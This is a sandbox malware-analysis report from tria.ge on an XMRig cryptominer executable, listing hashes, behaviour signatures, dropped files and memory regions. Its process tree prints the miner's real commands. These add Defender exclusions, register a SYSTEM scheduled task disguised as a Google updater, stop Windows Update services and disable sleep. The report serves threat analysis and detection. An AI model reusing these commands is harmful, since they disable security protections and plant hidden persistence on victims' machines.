Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23/01/2024, 10:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    6.3MB

  • MD5

    05a607cfc9ac7c66d4ce77dde0a2e491

  • SHA1

    56101cac6a6d7484b6b131f9dfa6345a9a889423

  • SHA256

    9bee594297039533caa952164d5f121d238d7c4f64cbcb7bd4b50925b66a9bee

  • SHA512

    3c77fe5a61db86b232965a3e2ae6addd9790a193f55d8c5f7ca56a4b4bb7b0431869e1f897557bd6e8995be991db1a6b82c968b8e62d1072dde6816cb347d680

  • SSDEEP

    98304:Eu50YoHGsu/ccnx9xKKPWCLqpcCEQFW7TlfpMarlx+yP/Vc+KOrlzfWmgGi60gMl:TMDu/f9xKWGpcR5lx1RbqSlpigy

Score
10/10
xmrigevasionminer

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 11 IoCs
    miner
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1204
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1196
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:2992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2916
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2788
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2696
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2152
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:2296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:844
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2688
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1572
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:892
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2704
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2608
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {206BD7AC-24D6-46C3-BD1D-D24E4982DD60} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2104
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1840
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          1⤵
          • Creates scheduled task(s)
          PID:2656
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2772
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          1⤵
          • Launches sc.exe
          PID:2828
        • C:\Windows\System32\sc.exe
          sc stop bits
          1⤵
          • Launches sc.exe
          PID:2748
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          1⤵
          • Launches sc.exe
          PID:2932
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          1⤵
          • Launches sc.exe
          PID:2840
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          1⤵
          • Launches sc.exe
          PID:2808
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1396
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2456
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2412
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          1⤵
          • Creates scheduled task(s)
          PID:2532
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1168
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          1⤵
          • Launches sc.exe
          PID:1556
        • C:\Windows\System32\sc.exe
          sc stop bits
          1⤵
          • Launches sc.exe
          PID:2160
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          1⤵
          • Launches sc.exe
          PID:2896
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          1⤵
          • Launches sc.exe
          PID:1852
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          1⤵
          • Launches sc.exe
          PID:2208

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          219KB

          MD5

          35d8c2f9fcfdccbb5c1c7f9226bddc14

          SHA1

          377cbbc7076a70b9c363023b790cd19c7b993bf6

          SHA256

          59a7f2d7eec59aa9f68297aef5e86fb7d2367d77632d0b7753eb74ae09345ee2

          SHA512

          9c76c5a67226de78ab3e24e43822b7d3102e4004d2ea16ef79d6016195e1048d168561100d09c8d3af6293d4c4ef132ba46c059e08aed6d150c282c52595acab

          Download Submit

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          654KB

          MD5

          7656e28f16990441c8bc8863abef8bd9

          SHA1

          5f6458b8fa16489899815055f507a5ae7608df4a

          SHA256

          25b2b57467e556b512232bebbd9c02c663bd6afeac3f3b4402c11390b287d43a

          SHA512

          39f1667c216948ec624e5dc6afaec79b7cb1d1e4931c0c8eb6575082fac4a748ad08d073025151da22ba6594943b85c4cb6d5ab27378e8ff06669a9c99e72e2e

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HLOFPLWEUI7JW3PIO0MU.temp
          Filesize

          7KB

          MD5

          bf39f2496a5471f03cc64c67d384c58a

          SHA1

          b314af8b9a699a56f06ba853f21a6af09c6e2188

          SHA256

          3dfb0029550b545a49843c6e4f6a7a7bc268367d3f0483f4550c495e5849853e

          SHA512

          17d80163a42884df2f7b80f33e10a40cccf3d9a2ff78bb574daa48bc0783de2d851c24848844edc6af5b6920d3a2ef9d88438f55c3a27efb270807332e717607

          Download Submit

        • C:\Windows\System32\drivers\etc\hosts
          Filesize

          2KB

          MD5

          3e9af076957c5b2f9c9ce5ec994bea05

          SHA1

          a8c7326f6bceffaeed1c2bb8d7165e56497965fe

          SHA256

          e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

          SHA512

          933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

          Download Submit

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          237KB

          MD5

          d018484fdd3002aba636e1c1c6f11ad7

          SHA1

          e59dcb5f3e11f6b2493941acfa2ef3abf6fb1414

          SHA256

          c83961d60a6d3888ba9d70e8fecf7bc65e1403d7bc677f35e1746cb87f3ccffc

          SHA512

          0055f91de02414eb5f969f00c8ab6f1cc7f55f4c09e9f0f41c6c1db4e71f601563f095ba7ca80dd6f13468ab4e9ae0e0f97c3336e24ce977d7eece4fc037d34d

          Download Submit

        • memory/844-50-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/844-54-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/844-53-0x00000000014B0000-0x0000000001530000-memory.dmp

          Filesize

          512KB

          Download

        • memory/844-52-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/844-51-0x00000000014B0000-0x0000000001530000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1196-16-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/1196-13-0x0000000002AB0000-0x0000000002B30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1196-8-0x000000001B650000-0x000000001B932000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1196-12-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/1196-14-0x0000000002AB0000-0x0000000002B30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1196-15-0x0000000002AB0000-0x0000000002B30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1196-9-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/1196-11-0x0000000002AB0000-0x0000000002B30000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1196-10-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1840-36-0x000000013F3A0000-0x000000014043E000-memory.dmp

          Filesize

          16.6MB

          Download

        • memory/2152-44-0x0000000001590000-0x0000000001610000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2152-63-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2152-40-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2152-41-0x0000000001590000-0x0000000001610000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2152-43-0x0000000001590000-0x0000000001610000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2152-46-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2152-45-0x0000000001590000-0x0000000001610000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2152-42-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2296-61-0x0000000140000000-0x000000014002A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/2296-67-0x0000000140000000-0x000000014002A000-memory.dmp

          Filesize

          168KB

          Download

        • memory/2688-72-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-78-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-84-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-82-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-80-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-59-0x00000000000B0000-0x00000000000D0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2688-62-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-68-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-60-0x0000000000310000-0x0000000000330000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2688-76-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-74-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-65-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-70-0x0000000140000000-0x00000001407EF000-memory.dmp

          Filesize

          7.9MB

          Download

        • memory/2688-66-0x0000000000310000-0x0000000000330000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2916-23-0x000000001B620000-0x000000001B902000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2916-25-0x0000000002850000-0x00000000028D0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2916-27-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2916-24-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2916-28-0x0000000002850000-0x00000000028D0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2916-26-0x0000000001D50000-0x0000000001D58000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2916-31-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/2916-30-0x0000000002850000-0x00000000028D0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2916-29-0x0000000002850000-0x00000000028D0000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2968-0-0x000000013FB70000-0x0000000140C0E000-memory.dmp

          Filesize

          16.6MB

          Download